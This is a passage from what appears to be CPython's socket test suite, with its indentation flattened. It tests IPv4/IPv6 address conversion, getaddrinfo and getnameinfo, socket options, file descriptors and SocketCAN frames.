except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
